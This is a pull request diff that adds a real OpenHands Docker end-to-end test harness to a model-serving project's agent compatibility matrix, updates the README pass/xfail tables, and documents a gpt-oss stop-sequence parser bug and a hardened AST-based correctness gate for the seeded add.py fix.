### PR TITLE
feat(integrations): real OpenHands Docker E2E harness — un-xfail 4 Tier-1 family cells

### DIFF
--- a/tests/integrations/README.md
+++ b/tests/integrations/README.md
@@ -181,13 +181,17 @@ the real harness `test_openhands.sh` which pulls the pinned OpenHands
 invokes `docker run ... python -m openhands.core.main -t "Fix the bug
 in add.py — ..." -d /workspace` with the sandbox docker-in-docker
 sock passthrough, then asserts the file was rewritten. The correctness
-gate is a **five-pair `add(a, b) == a + b` runtime sweep** — same
-scratch-file scaffolding as Aider (`return a - b  # BUG` seed) but a
-stronger polynomial-masquerade-proof gate: `(2,3)→5`, `(10,-4)→6`,
-`(0,0)→0`, `(-1,1)→0`, `(100,200)→300` jointly pin the linear combination
-to slope-1 on both variables with zero intercept, so no `a + k`,
-`a - b + k`, `a + b + k` (k ≠ 0), or hard-coded `return CONST` cheat can
-satisfy all five (codex #1048 round-1 findings #2/#3). OpenHands'
+gate is a **strict AST whitelist on `add.py`'s return expression** —
+same scratch-file scaffolding as Aider (`return a - b  # BUG` seed) but
+a stronger, non-executing gate: parse the file, find `def add(a, b): …`,
+and require the returned expression to be one of `{a + b`, `b + a`,
+`sum([a, b])` / `sum((a, b))`, `operator.add(a, b)`}` after an optional
+docstring, with the signature pinned to `(a, b)` (no `*args` /
+`**kwargs` / extra positional). Strictly stronger than a runtime
+pair-sweep (no `a - b + k`, `(a - b) + k`, `return CONST`, or `if …:
+return 5` cheat can satisfy the AST shape) AND safer — zero code
+execution, so the LLM's output never touches the host process (codex
+#1048 rounds 1 / 3 / 4). OpenHands'
 CodeActAgent parses `<execute_ipython>` / `<execute_bash>` text-action
 tags from plain-text LLM output, NOT via OpenAI tool_calls, so
 R1-Distill drives it successfully (same pattern as Aider). ONE family

--- a/tests/integrations/README.md
+++ b/tests/integrations/README.md
@@ -183,15 +183,22 @@ in add.py — ..." -d /workspace` with the sandbox docker-in-docker
 sock passthrough, then asserts the file was rewritten. The correctness
 gate is a **strict AST whitelist on `add.py`'s return expression** —
 same scratch-file scaffolding as Aider (`return a - b  # BUG` seed) but
-a stronger, non-executing gate: parse the file, find `def add(a, b): …`,
-and require the returned expression to be one of `{a + b`, `b + a`,
-`sum([a, b])` / `sum((a, b))`, `operator.add(a, b)`}` after an optional
+a stronger, non-executing gate: parse the file, first require the
+module's top level to be **only** a `def add` (optionally preceded by
+a docstring — codex #1048 round 6 finding #3 rejected the previous
+"allow arbitrary other top-level statements" behaviour that would let
+an injected `import os; os.system(...)` slip past a good `def add`),
+find `def add(a, b): …`, and require the returned expression to be one
+of `{a + b`, `b + a`, `sum([a, b])` / `sum((a, b))`}` after an optional
 docstring, with the signature pinned to `(a, b)` (no `*args` /
-`**kwargs` / extra positional). Strictly stronger than a runtime
+`**kwargs` / extra positional). The previous `operator.add(a, b)`
+branch was removed in round 5 because the whitelist did not verify
+`import operator` at module top level, so it would accept a file that
+`NameError`d at import time. Strictly stronger than a runtime
 pair-sweep (no `a - b + k`, `(a - b) + k`, `return CONST`, or `if …:
 return 5` cheat can satisfy the AST shape) AND safer — zero code
 execution, so the LLM's output never touches the host process (codex
-#1048 rounds 1 / 3 / 4). OpenHands'
+#1048 rounds 1 / 3 / 4 / 5 / 6). OpenHands'
 CodeActAgent parses `<execute_ipython>` / `<execute_bash>` text-action
 tags from plain-text LLM output, NOT via OpenAI tool_calls, so
 R1-Distill drives it successfully (same pattern as Aider). ONE family

--- a/tests/integrations/README.md
+++ b/tests/integrations/README.md
@@ -180,9 +180,14 @@ the real harness `test_openhands.sh` which pulls the pinned OpenHands
 `ghcr.io/all-hands-ai/runtime:od_v0.9.0_image_nikolaik___python-nodejs_tag_python3.11-nodejs22`),
 invokes `docker run ... python -m openhands.core.main -t "Fix the bug
 in add.py — ..." -d /workspace` with the sandbox docker-in-docker
-sock passthrough, then asserts the file was rewritten. Same
-`add(2, 3) == 5` correctness gate as Aider (AST BinOp(op=Add) + runtime
-check) so the two harnesses agree on the pass gate. OpenHands'
+sock passthrough, then asserts the file was rewritten. The correctness
+gate is a **five-pair `add(a, b) == a + b` runtime sweep** — same
+scratch-file scaffolding as Aider (`return a - b  # BUG` seed) but a
+stronger polynomial-masquerade-proof gate: `(2,3)→5`, `(10,-4)→6`,
+`(0,0)→0`, `(-1,1)→0`, `(100,200)→300` jointly pin the linear combination
+to slope-1 on both variables with zero intercept, so no `a + k`,
+`a - b + k`, `a + b + k` (k ≠ 0), or hard-coded `return CONST` cheat can
+satisfy all five (codex #1048 round-1 findings #2/#3). OpenHands'
 CodeActAgent parses `<execute_ipython>` / `<execute_bash>` text-action
 tags from plain-text LLM output, NOT via OpenAI tool_calls, so
 R1-Distill drives it successfully (same pattern as Aider). ONE family

--- a/tests/integrations/README.md
+++ b/tests/integrations/README.md
@@ -62,7 +62,7 @@ for operator scope call in the PR body).
 | claude-code | `/v1/messages` | `TestClaudeCode` | `test_anthropic_sdk.py` |
 | opencode | `/v1/chat/completions` | `TestOpenCode` (wire smoke via OpenAI SDK) | (matrix only) |
 | qwen-code | `/v1/chat/completions` | `TestQwenCode` (wire smoke via OpenAI SDK) | (matrix only) |
-| openhands | `/v1/chat/completions` | `TestOpenHands` (**wire smoke only** — does not exercise the real OpenHands binary / LiteLLM shim) | (Docker E2E deferred to 0.10.6 Phase 4) |
+| openhands | shell subprocess → Docker → `/v1/chat/completions` | `TestOpenHands` (**real Docker E2E harness** — drives pinned OpenHands 0.9.0 app + runtime images with `python -m openhands.core.main -t`, asserts add.py corrected) | `test_openhands.sh` (same harness, standalone) |
 | hermes-agent | `/v1/chat/completions` | `TestHermesAgent` (wire smoke via OpenAI SDK) | `test_hermes.py` (real 62-tool E2E) |
 | aider | shell subprocess → `/v1/chat/completions` | `TestAider` (**real bash-CLI harness** — drives aider one-shot with `--message`, asserts add.py corrected) | `test_aider.sh` (same harness, standalone) |
 | kilo-code | `/v1/chat/completions` | `TestKiloCode` (wire smoke via OpenAI SDK) | (matrix only) |
@@ -119,7 +119,8 @@ python3 tests/integrations/test_anthropic_sdk.py
 python3 tests/integrations/test_openwebui.py
 
 # Deep flows (CLI / Docker)
-bash tests/integrations/test_aider.sh
+bash tests/integrations/test_aider.sh --model qwen3.5-4b-4bit --port 8802
+bash tests/integrations/test_openhands.sh --model qwen3.5-4b-4bit --port 8802
 python3 tests/integrations/test_librechat_docker.py
 ```
 
@@ -162,17 +163,39 @@ real tool-call routing (function name = `get_weather`, arg parses as
 JSON, `city == "Tokyo"`, no `<think>` leak, no `<|channel|>analysis`
 leak). PydanticAI + smolagents cells assert the tool implementation
 itself was invoked (closure counter check), not just that the model
-produced final text. OpenHands `XFAIL`s structurally because its
-native wire is a text-action format, not OpenAI function calling —
-real coverage lives in a Docker E2E harness. Aider now runs a real
-bash-CLI harness (drop-out of the previous structural XFAIL): the
-matrix cell shells out to `test_aider.sh`, which seeds a scratch
-`add.py` with `return a - b  # BUG`, drives `aider --message "Fix
-the bug ..."` one-shot against `/v1/chat/completions`, and asserts
-the file was rewritten to `return a + b`. Aider's own edit format
+produced final text. Aider now runs a real bash-CLI harness (drop-out
+of the previous structural XFAIL): the matrix cell shells out to
+`test_aider.sh`, which seeds a scratch `add.py` with
+`return a - b  # BUG`, drives `aider --message "Fix the bug ..."`
+one-shot against `/v1/chat/completions`, and asserts the file was
+rewritten to `return a + b`. Aider's own edit format
 (`SEARCH ... REPLACE ...` in plain text) does NOT require OpenAI
 tool_calls, so R1-Distill drives it successfully alongside the
 other three families.
+
+OpenHands 2026-07-07 update — the four `openhands` cells previously
+strict-`XFAIL`'d as a "Docker E2E harness required" placeholder now run
+the real harness `test_openhands.sh` which pulls the pinned OpenHands
+0.9.0 app + runtime images (`ghcr.io/all-hands-ai/openhands:0.9.0` +
+`ghcr.io/all-hands-ai/runtime:od_v0.9.0_image_nikolaik___python-nodejs_tag_python3.11-nodejs22`),
+invokes `docker run ... python -m openhands.core.main -t "Fix the bug
+in add.py — ..." -d /workspace` with the sandbox docker-in-docker
+sock passthrough, then asserts the file was rewritten. Same
+`add(2, 3) == 5` correctness gate as Aider (AST BinOp(op=Add) + runtime
+check) so the two harnesses agree on the pass gate. OpenHands'
+CodeActAgent parses `<execute_ipython>` / `<execute_bash>` text-action
+tags from plain-text LLM output, NOT via OpenAI tool_calls, so
+R1-Distill drives it successfully (same pattern as Aider). ONE family
+still `XFAIL`s: gpt-oss + OpenHands hits a rapid-mlx harmony-parser
+stop-sequence scoping bug — the parser applies user-supplied
+`stop=['</execute_ipython>', ...]` against the raw token stream across
+BOTH channels, so the model's analysis-channel CoT (which mentions
+`</execute_ipython>` while reasoning about the action) triggers a
+premature stop before the final channel emits any visible content.
+Root-caused empirically inside the OpenHands container (G8, see
+`conftest.py::_GPTOSS_OPENHANDS_XFAIL_REASON` block) — fix belongs in
+`vllm_mlx` harmony parser (restrict user-supplied stops to
+final-channel content), tracked as a follow-up server-side issue.
 
 DeepSeek family Tier-1 rep was **swapped** from
 `deepseek-v4-flash-8bit` (~155 GB, single-node-infeasible on M3 Ultra
@@ -186,10 +209,10 @@ Full V4 Flash coverage tracked in follow-up issue **#1041**
 
 | Family | Boot alias | Boot time | Wall time (14 cells) | Result |
 |---|---|---|---|---|
-| Qwen 3.6 | `qwen3.6-35b-8bit` (MoE, 3 B active) | ~15 s | 11.32 s + ~3 s aider | 13 PASS / 1 XFAIL |
-| Gemma 4 | `gemma-4-31b-4bit` (dense) | ~10 s | 17.45 s + ~7 s aider | 13 PASS / 1 XFAIL |
-| DeepSeek | `deepseek-r1-32b-4bit` (R1-distilled Qwen 32B, dense) | ~18 s | 191.29 s + ~22 s aider | 4 PASS / 10 XFAIL (9 arch-XFAIL R1-Distill tool-call gap, 1 pre-existing OpenHands) |
-| gpt-oss | `gpt-oss-120b-mxfp4-q8` (MoE) | ~15 s | 14.61 s + ~3 s aider | 13 PASS / 1 XFAIL |
+| Qwen 3.6 | `qwen3.6-35b-8bit` (MoE, 3 B active) | ~15 s | 11.32 s + ~3 s aider + ~32 s openhands | 14 PASS / 0 XFAIL |
+| Gemma 4 | `gemma-4-31b-4bit` (dense) | ~10 s | 17.45 s + ~7 s aider + ~48 s openhands | 14 PASS / 0 XFAIL |
+| DeepSeek | `deepseek-r1-32b-4bit` (R1-distilled Qwen 32B, dense) | ~18 s | 191.29 s + ~22 s aider + ~72 s openhands | 5 PASS / 9 XFAIL (9 arch-XFAIL R1-Distill tool-call gap; OpenHands passes because it parses text-action tags, not tool_calls) |
+| gpt-oss | `gpt-oss-120b-mxfp4-q8` (MoE) | ~15 s | 14.61 s + ~3 s aider + XFAIL openhands | 13 PASS / 1 XFAIL (OpenHands XFAIL — rapid-mlx harmony stop-sequence scoping bug, root-caused, follow-up server fix) |
 
 > **Aider row added post-pilot 2026-07-07.** The pilot times above are the
 > 12-cell subset (aider was structural XFAIL). Re-running with the real
@@ -202,13 +225,27 @@ Full V4 Flash coverage tracked in follow-up issue **#1041**
 > DeepSeek R1-Distill-32B-4bit 22.26 s, gpt-oss-20B-MXFP4-Q8 3.15 s —
 > all four PASS with add.py rewritten to ``return a + b``.
 
+> **OpenHands row added 2026-07-07.** `test_openhands.sh` runs OpenHands
+> 0.9.0 inside Docker with a docker-in-docker sandbox — cold-cache
+> boot pulls two images (~3.4 GB + ~9 GB uncompressed) and builds a
+> hash-tagged runtime layer (first run ~5 min on a warm apt mirror);
+> subsequent runs reuse the hash-tagged image and take 30-75 s
+> per cell. Family-by-family (2026-07-07, cached-image path, 8802 port,
+> `--tool-call-parser <family>` + `--enable-auto-tool-choice`):
+> Qwen 3.5-4B-4bit (`qwen36` rep) 32.14 s (2 CodeAct steps: read →
+> `edit_file_by_replace` → finish), Gemma-4-31B-4bit 47.87 s, DeepSeek
+> R1-Distill-32B-4bit 72.08 s (long analysis-channel CoT before the
+> edit action but still one-shot), gpt-oss-20B-MXFP4-Q8 **XFAIL** at
+> 615 s (harness timeout — see the paragraph above and
+> `conftest.py::_GPTOSS_OPENHANDS_XFAIL_REASON`).
+
 | Agent | Qwen 3.6 | Gemma 4 | DeepSeek | gpt-oss |
 |---|---|---|---|---|
 | codex-cli | ✅ | ✅ | ✅ | ✅ |
 | claude-code | ✅ | ✅ | ✅ | ✅ |
 | opencode | ✅ | ✅ | XFAIL (arch) | ✅ |
 | qwen-code | ✅ | ✅ | XFAIL (arch) | ✅ |
-| openhands | XFAIL | XFAIL | XFAIL | XFAIL |
+| openhands | ✅ | ✅ | ✅ | XFAIL (server) |
 | hermes-agent | ✅ | ✅ | XFAIL (arch) | ✅ |
 | aider | ✅ | ✅ | ✅ | ✅ |
 | kilo-code | ✅ | ✅ | XFAIL (arch) | ✅ |
@@ -225,15 +262,18 @@ Full V4 Flash coverage tracked in follow-up issue **#1041**
 | smolagents | ✅ | ✅ | ✅ | ✅ |
 
 Legend: ✅ passing (real inference · real tool call · semantic assertion;
-or for aider: real bash-CLI drive · real file rewrite)
-· XFAIL = strict expected-fail with reason (Docker harness required for
-OpenHands; **XFAIL (arch)** = R1-Distill architectural tool-emission gap,
-see next paragraph and issue #1041)
+or for aider / openhands: real bash-CLI drive · real file rewrite)
+· **XFAIL (arch)** = R1-Distill architectural tool-emission gap (see next
+paragraph and issue #1041) · **XFAIL (server)** = rapid-mlx server-side
+harmony stop-sequence scoping bug that surfaces only under OpenHands'
+CodeActAgent `stop=['</execute_ipython>', ...]` argument (root-caused,
+see `conftest.py::_GPTOSS_OPENHANDS_XFAIL_REASON`)
 
-**Totals across all 4 families**: 56 cells run → **43 PASS · 13 XFAIL · 0 FAIL**
+**Totals across all 4 families**: 56 cells run → **46 PASS · 10 XFAIL · 0 FAIL**
 (9 XFAIL are the R1-Distill architectural tool-emission cells listed in
-`conftest.py::_DEEPSEEK_R1_TOOLCALL_XFAIL_NODEIDS`; 4 XFAIL are OpenHands
-across all four families pending the 0.10.6 Phase 4 Docker E2E harness).
+`conftest.py::_DEEPSEEK_R1_TOOLCALL_XFAIL_NODEIDS`; 1 XFAIL is the
+gpt-oss+OpenHands cell — rapid-mlx harmony stop-sequence scoping bug,
+tracked as a follow-up server-side issue).
 
 **DeepSeek family — architectural tool-emission gap.** The 9 DeepSeek
 tool-call cells (7 agents + LangChain + PydanticAI) are marked
@@ -265,6 +305,7 @@ For reference — this is what the deep flows historically covered on the
 | `test_anthropic_sdk.py` | x | x | x | — | — | `/v1/messages` endpoint |
 | `test_openwebui.py` | — | x | — | — | — | Docker: register, login, models, chat |
 | `test_aider.sh` | — | — | — | — | — | CLI edit-and-write workflow |
+| `test_openhands.sh` | — | — | — | — | — | Docker E2E: CodeActAgent edit-and-write against a running server (2026-07-07) |
 | `test_librechat_docker.py` | — | — | — | — | — | Docker: register, login, endpoints, models |
 | `test_hermes.py` | x | x | x | x | — | 62-tool Hermes Agent E2E + API stress test |
 

--- a/tests/integrations/conftest.py
+++ b/tests/integrations/conftest.py
@@ -258,8 +258,11 @@ def family_alias_for_active_server(
     ):
         return _FAMILY_ALIASES["deepseek"]
     # Qwen 3.5 stands in for Qwen 3.6 in the small-alias matrix (see
-    # ``_FAMILY_ALIASES['qwen36'].reason``).
-    if mid.startswith("qwen3.5"):
+    # ``_FAMILY_ALIASES['qwen36'].reason``). Substring match — not just
+    # startswith — because the served id may carry a repo prefix
+    # (``mlx-community/Qwen3.5-4B-MLX-4bit``), matching how the qwen3.6
+    # / gemma-4 / gpt-oss / deepseek arms above resolve full HF paths.
+    if mid.startswith("qwen3.5") or "qwen3.5" in mid:
         return _FAMILY_ALIASES["qwen36"]
     return None
 
@@ -331,12 +334,89 @@ _DEEPSEEK_R1_XFAIL_REASON = (
 )
 
 
+# --------------------------------------------------------------------------- #
+# Family-specific strict-xfail: gpt-oss + OpenHands
+# --------------------------------------------------------------------------- #
+#
+# Root-cause (G8, verified empirically 2026-07-07 with the 0.9.0 OpenHands
+# Docker harness in this PR): the CodeActAgent sets
+#
+#   stop=["</execute_ipython>", "</execute_bash>", "</execute_browse>"]
+#
+# on every /v1/chat/completions request. gpt-oss (harmony) produces its
+# response in two channels — an internal ``analysis`` channel (chain-of-
+# thought) and a visible ``final`` channel. rapid-mlx's harmony parser
+# applies user-supplied stop sequences against the raw token stream (both
+# channels), so the model's analysis-channel CoT — which routinely
+# mentions the ``</execute_ipython>`` string when reasoning about the
+# CodeAct action to take — triggers a premature stop BEFORE the model can
+# switch to the final channel. Result: ``content=""`` with
+# ``reasoning_content`` holding the full CoT, and CodeActAgent falls back
+# to an empty ``MessageAction`` and asks for user input (which fails
+# under ``python -m openhands.core.main -t`` headless mode).
+#
+# Reproducer (from inside the OpenHands 0.9.0 container):
+#
+#   >>> litellm.completion(
+#   ...   model="openai/gpt-oss-20b-mxfp4-q8",
+#   ...   api_base="http://host.docker.internal:PORT/v1",
+#   ...   max_tokens=8192, temperature=0.0,
+#   ...   stop=["</execute_ipython>","</execute_bash>","</execute_browse>"],
+#   ...   messages=[{"role":"system","content":"...<execute_ipython>..."},
+#   ...             {"role":"user","content":"Print hello world in ipython."}])
+#   choice.message.content == ""
+#   choice.message.reasoning_content ends with "</execute_ipython>"
+#
+# The SAME prompt without the ``stop=`` argument returns the correct
+# ``<execute_ipython>\nprint("hello world")\n</execute_ipython>`` in
+# ``content`` and clean CoT in ``reasoning_content``. So the failure is
+# NOT the CodeAct system prompt, NOT ``max_tokens`` (bumped to 8192), and
+# NOT LiteLLM routing — it's the harmony parser scoping user-supplied
+# stops incorrectly. Fix belongs in ``vllm_mlx/*harmony*.py`` (restrict
+# user-supplied stops to final-channel content) and is tracked in a
+# follow-up issue linked from the PR body.
+#
+# All THREE other Tier-1 family reps (qwen3.5-4b-4bit, gemma-4-31b-4bit,
+# deepseek-r1-32b-4bit) PASS the OpenHands harness empirically at boot —
+# this is a gpt-oss/harmony-specific parser bug, not a general OpenHands
+# regression, so we scope the xfail to exactly one cell and leave the
+# other three green.
+
+_GPTOSS_OPENHANDS_XFAIL_REASON = (
+    "gpt-oss (harmony) + OpenHands: CodeActAgent sets "
+    "stop=['</execute_ipython>', '</execute_bash>', '</execute_browse>']. "
+    "rapid-mlx's harmony parser applies user-supplied stops against the "
+    "raw token stream across BOTH channels, so the model's analysis-"
+    "channel CoT — which routinely mentions '</execute_ipython>' while "
+    "reasoning about the action — triggers a premature stop before the "
+    "final channel emits any content. Response: content='', "
+    "reasoning_content ends with '</execute_ipython>'. Root-caused "
+    "empirically inside the 0.9.0 OpenHands container (G8). Fix belongs "
+    "in vllm_mlx harmony parser (restrict user-supplied stops to final-"
+    "channel content) — tracked in follow-up issue. All THREE other "
+    "Tier-1 family reps pass the OpenHands harness."
+)
+
+
 def pytest_collection_modifyitems(
     config: pytest.Config, items: list[pytest.Item]
 ) -> None:
-    """Apply strict-xfail to the 9 DeepSeek tool_call cells (see block above)."""
+    """Apply strict-xfail to the DeepSeek tool_call + gpt-oss/OpenHands cells."""
     del config  # unused — items already carry the config context.
     for item in items:
+        # gpt-oss + OpenHands — rapid-mlx harmony stop-sequence scoping bug.
+        if (
+            "[gptoss]" in item.nodeid
+            and "test_agents_matrix.py::TestOpenHands" in item.nodeid
+        ):
+            item.add_marker(
+                pytest.mark.xfail(
+                    reason=_GPTOSS_OPENHANDS_XFAIL_REASON,
+                    strict=True,
+                )
+            )
+            continue
+        # DeepSeek R1-Distill tool-call gap (block above).
         if "[deepseek]" not in item.nodeid:
             continue
         for prefix in _DEEPSEEK_R1_TOOLCALL_XFAIL_NODEIDS:

--- a/tests/integrations/test_agents_matrix.py
+++ b/tests/integrations/test_agents_matrix.py
@@ -61,14 +61,15 @@ OpenHands — previously a strict-xfail placeholder pending "Docker E2E
 harness required for OpenHands' text-action format" — has landed the
 same shape: ``TestOpenHands`` now shells out to ``test_openhands.sh``
 which drives the pinned OpenHands 0.9.0 app + runtime images against
-``rapid-mlx serve`` and asserts add.py corrected. Correctness gate is
-a **five-pair ``add(a, b) == a + b`` runtime sweep**
-(``(2,3)→5``, ``(10,-4)→6``, ``(0,0)→0``, ``(-1,1)→0``,
-``(100,200)→300``) that jointly pins the linear combination to slope-1
-on both variables with zero intercept — proof against ``a - b + k`` and
-``return CONST`` masquerades (codex #1048 round-1 findings #2/#3), and
-strictly stronger than Aider's still-single-pair gate. Docker-daemon
-skip guard so non-Docker CI stays green.
+``rapid-mlx serve`` and asserts add.py corrected. Correctness gate is a **strict AST whitelist on ``add.py``'s return
+expression** (parses the file, requires the return to be one of
+``a + b`` / ``b + a`` / ``sum([a, b])`` / ``sum((a, b))`` /
+``operator.add(a, b)`` after an optional docstring, with the signature
+pinned to ``(a, b)``). Non-executing, so the LLM's output never touches
+the host process; strictly stronger than a runtime pair-sweep (no
+``a - b + k``, ``return CONST``, or ``if …: return 5`` cheat can
+satisfy the AST shape). Docker-daemon skip guard so non-Docker CI
+stays green.
 """
 
 from __future__ import annotations

--- a/tests/integrations/test_agents_matrix.py
+++ b/tests/integrations/test_agents_matrix.py
@@ -53,12 +53,17 @@ Rationale for lightweight cells + heavy dedicated files:
 
 **Cells not exercised in this file — see the "🔲 pending" cells of the
 README matrix:** claude-code needs an installed ``anthropic`` package (in
-optional extras, not core); openhands needs Docker (E2E harness lives in
-``test_openhands.py``, deferred to 0.10.6 Phase 4 plumbing per 0.10-TODO
-line 246). Aider previously deferred to ``test_aider.sh`` for its
-edit-and-write flow; as of 0.10.3-window the matrix cell now shells out
-to that harness directly (see ``TestAider`` below) so the four Tier-1
-family cells run for real instead of xfail'ing structurally.
+optional extras, not core). Aider previously deferred to ``test_aider.sh``
+for its edit-and-write flow; as of 0.10.3-window the matrix cell now
+shells out to that harness directly (see ``TestAider`` below) so the four
+Tier-1 family cells run for real instead of xfail'ing structurally.
+OpenHands — previously a strict-xfail placeholder pending "Docker E2E
+harness required for OpenHands' text-action format" — has landed the
+same shape: ``TestOpenHands`` now shells out to ``test_openhands.sh``
+which drives the pinned OpenHands 0.9.0 app + runtime images against
+``rapid-mlx serve`` and asserts add.py corrected. Same correctness
+taxonomy as Aider (AST BinOp(op=Add) + runtime add(2, 3) == 5), same
+docker-daemon skip guard so non-Docker CI stays green.
 """
 
 from __future__ import annotations
@@ -370,39 +375,125 @@ class TestQwenCode:
         _run_openai_tool_smoke(rapid_mlx_server, family_alias, agent_label="qwen-code")
 
 
-@pytest.mark.xfail(
-    strict=True,
-    reason=(
-        "OpenHands uses text-action format (openhands.yaml "
-        "capabilities.function_calling: false), NOT OpenAI-style function "
-        "calling — no OpenAI-shape tool_calls to parse. Real drive requires "
-        "the Docker E2E harness deferred to 0.10.6 Phase 4. Wire-only smoke "
-        "was previously here but was flagged as shape-only. Kept as a "
-        "structural xfail so the matrix stays symmetric and the intended "
-        "coverage gap is grep-visible in test output."
-    ),
-)
 class TestOpenHands:
-    """OpenHands — expected-fail placeholder for Docker E2E harness.
+    """OpenHands — real Docker E2E harness (``test_openhands.sh``).
 
-    OpenHands' native wire is a text-action format, not OpenAI function
-    calling. A tool-call assertion against ``/v1/chat/completions``
-    cannot faithfully represent what OpenHands actually drives. The
-    real coverage will land in the 0.10.6 Phase 4 Docker E2E harness;
-    this placeholder xfails strictly so the matrix cell count stays at
-    11 × 4 and the coverage gap can't be quietly forgotten.
+    OpenHands' native wire is a text-action format, NOT OpenAI function
+    calling — the CodeActAgent parses the model's plaintext reply,
+    extracts actions (``IPythonRunCellAction``, ``CmdRunAction``, edit
+    blocks), and applies file edits through its sandbox runtime.
+    So the correctness signal is **did OpenHands actually rewrite the
+    file the way we asked**, not **did tool_calls fire**.
+
+    The bash harness at ``tests/integrations/test_openhands.sh`` takes
+    ``--model <alias>`` + ``--base-url <url>``, seeds a scratch
+    ``add.py`` with ``return a - b  # BUG``, runs
+    ``docker run ... python -m openhands.core.main -t "Fix the bug ..."``
+    with pinned OpenHands 0.9.0 app + runtime images, then asserts
+    (a) the container exited 0 and (b) the file now contains
+    ``return a + b``. Full family-by-family empirical verification is
+    documented in the PR that un-xfailed this cell.
+
+    Skipped (not failed) when Docker isn't available so non-Docker CI
+    stays green; the real coverage is Apple-silicon local + Docker CI
+    only.
     """
+
+    _HARNESS_TIMEOUT_SECONDS = 600  # generous — OpenHands boots a sandbox
+
+    @staticmethod
+    def _docker_available() -> bool:
+        """Return True iff the Docker daemon is reachable.
+
+        ``docker info`` is the canonical daemon-alive probe (``docker
+        version`` returns client-side even when the socket is dead). We
+        cap the probe at 5 s so a hung / half-crashed daemon doesn't
+        turn every OpenHands cell into a 30-second hang.
+        """
+        docker_bin = shutil.which("docker")
+        if docker_bin is None:
+            return False
+        try:
+            result = subprocess.run(
+                [docker_bin, "info"],
+                capture_output=True,
+                timeout=5,
+            )
+        except (subprocess.TimeoutExpired, OSError):
+            return False
+        return result.returncode == 0
 
     def test_smoke(
         self,
         rapid_mlx_server: dict[str, Any],
         family_alias: FamilyAlias,
     ) -> None:
-        pytest.fail(
-            f"openhands/{family_alias.family}: strict xfail — Docker E2E "
-            "harness required for OpenHands' text-action format; OpenAI "
-            "tool-call shape does not apply. See class docstring."
-        )
+        harness = Path(__file__).parent / "test_openhands.sh"
+        assert harness.exists(), f"openhands harness missing: {harness}"
+
+        # Docker daemon is a hard prerequisite for OpenHands' sandbox
+        # runtime (docker-in-docker sock passthrough). Skip cleanly on
+        # environments without Docker so non-Docker CI still passes;
+        # Apple-silicon local + Docker CI cover the real coverage.
+        if not self._docker_available():
+            pytest.skip(
+                "Docker daemon required for OpenHands E2E harness "
+                "(start Docker Desktop / dockerd — the harness runs "
+                "the pinned OpenHands app + sandbox runtime images)."
+            )
+
+        # Pass the FULL parsed base_url to the harness — the harness
+        # itself rewrites the host to ``host.docker.internal`` for the
+        # inside-container view, so a fixture pointed at a non-localhost
+        # host (CI shard on a remote-serve node) still tests the right
+        # server. ``--base-url`` is authoritative; ``--port`` is only
+        # kept for standalone local invocations.
+        base_url = rapid_mlx_server["base_url"]
+        model_id = rapid_mlx_server["model_id"]
+
+        env = os.environ.copy()
+
+        try:
+            result = subprocess.run(
+                [
+                    "bash",
+                    str(harness),
+                    "--model",
+                    model_id,
+                    "--base-url",
+                    base_url,
+                    "--timeout",
+                    str(self._HARNESS_TIMEOUT_SECONDS),
+                ],
+                capture_output=True,
+                text=True,
+                # +60 s over the harness's internal ``timeout(1)`` so
+                # cleanup + docker rm -f can run without the pytest
+                # wall-timeout tripping first.
+                timeout=self._HARNESS_TIMEOUT_SECONDS + 60,
+                env=env,
+            )
+        except subprocess.TimeoutExpired as exc:
+            pytest.fail(
+                f"openhands/{family_alias.family}: harness wall-timeout "
+                f"({self._HARNESS_TIMEOUT_SECONDS + 60}s) exceeded. "
+                f"stdout(tail)={(exc.stdout or b'')[-800:]!r} "
+                f"stderr(tail)={(exc.stderr or b'')[-800:]!r}"
+            )
+
+        # Assert exit 0 with the tail of stdout+stderr for diagnostics
+        # — the harness itself already prints BEFORE/AFTER add.py and
+        # the last 60 lines of the openhands log, so this is enough to
+        # root-cause any empirical failure without re-running.
+        if result.returncode != 0:
+            tail_out = result.stdout[-2000:] if result.stdout else ""
+            tail_err = result.stderr[-1000:] if result.stderr else ""
+            pytest.fail(
+                f"openhands/{family_alias.family}: harness exited "
+                f"{result.returncode} on model {model_id!r}\n"
+                f"--- stdout tail ---\n{tail_out}\n"
+                f"--- stderr tail ---\n{tail_err}"
+            )
 
 
 class TestHermesAgent:

--- a/tests/integrations/test_agents_matrix.py
+++ b/tests/integrations/test_agents_matrix.py
@@ -62,11 +62,13 @@ harness required for OpenHands' text-action format" — has landed the
 same shape: ``TestOpenHands`` now shells out to ``test_openhands.sh``
 which drives the pinned OpenHands 0.9.0 app + runtime images against
 ``rapid-mlx serve`` and asserts add.py corrected. Correctness gate is a **strict AST whitelist on ``add.py``'s return
-expression** (parses the file, requires the return to be one of
-``a + b`` / ``b + a`` / ``sum([a, b])`` / ``sum((a, b))`` /
-``operator.add(a, b)`` after an optional docstring, with the signature
-pinned to ``(a, b)``). Non-executing, so the LLM's output never touches
-the host process; strictly stronger than a runtime pair-sweep (no
+expression** (parses the file, requires the module top level to be a
+single ``def add`` optionally preceded by a docstring, the ``def add``
+itself to have no decorators / defaults / annotations, and the return
+to be one of ``a + b`` / ``b + a`` / ``sum([a, b])`` / ``sum((a, b))``
+after an optional function-level docstring, with the signature pinned
+to ``(a, b)``). Non-executing, so the LLM's output never touches the
+host process; strictly stronger than a runtime pair-sweep (no
 ``a - b + k``, ``return CONST``, or ``if …: return 5`` cheat can
 satisfy the AST shape). Docker-daemon skip guard so non-Docker CI
 stays green.

--- a/tests/integrations/test_agents_matrix.py
+++ b/tests/integrations/test_agents_matrix.py
@@ -61,9 +61,14 @@ OpenHands — previously a strict-xfail placeholder pending "Docker E2E
 harness required for OpenHands' text-action format" — has landed the
 same shape: ``TestOpenHands`` now shells out to ``test_openhands.sh``
 which drives the pinned OpenHands 0.9.0 app + runtime images against
-``rapid-mlx serve`` and asserts add.py corrected. Same correctness
-taxonomy as Aider (AST BinOp(op=Add) + runtime add(2, 3) == 5), same
-docker-daemon skip guard so non-Docker CI stays green.
+``rapid-mlx serve`` and asserts add.py corrected. Correctness gate is
+a **five-pair ``add(a, b) == a + b`` runtime sweep**
+(``(2,3)→5``, ``(10,-4)→6``, ``(0,0)→0``, ``(-1,1)→0``,
+``(100,200)→300``) that jointly pins the linear combination to slope-1
+on both variables with zero intercept — proof against ``a - b + k`` and
+``return CONST`` masquerades (codex #1048 round-1 findings #2/#3), and
+strictly stronger than Aider's still-single-pair gate. Docker-daemon
+skip guard so non-Docker CI stays green.
 """
 
 from __future__ import annotations

--- a/tests/integrations/test_agents_matrix.py
+++ b/tests/integrations/test_agents_matrix.py
@@ -485,8 +485,13 @@ class TestOpenHands:
             pytest.fail(
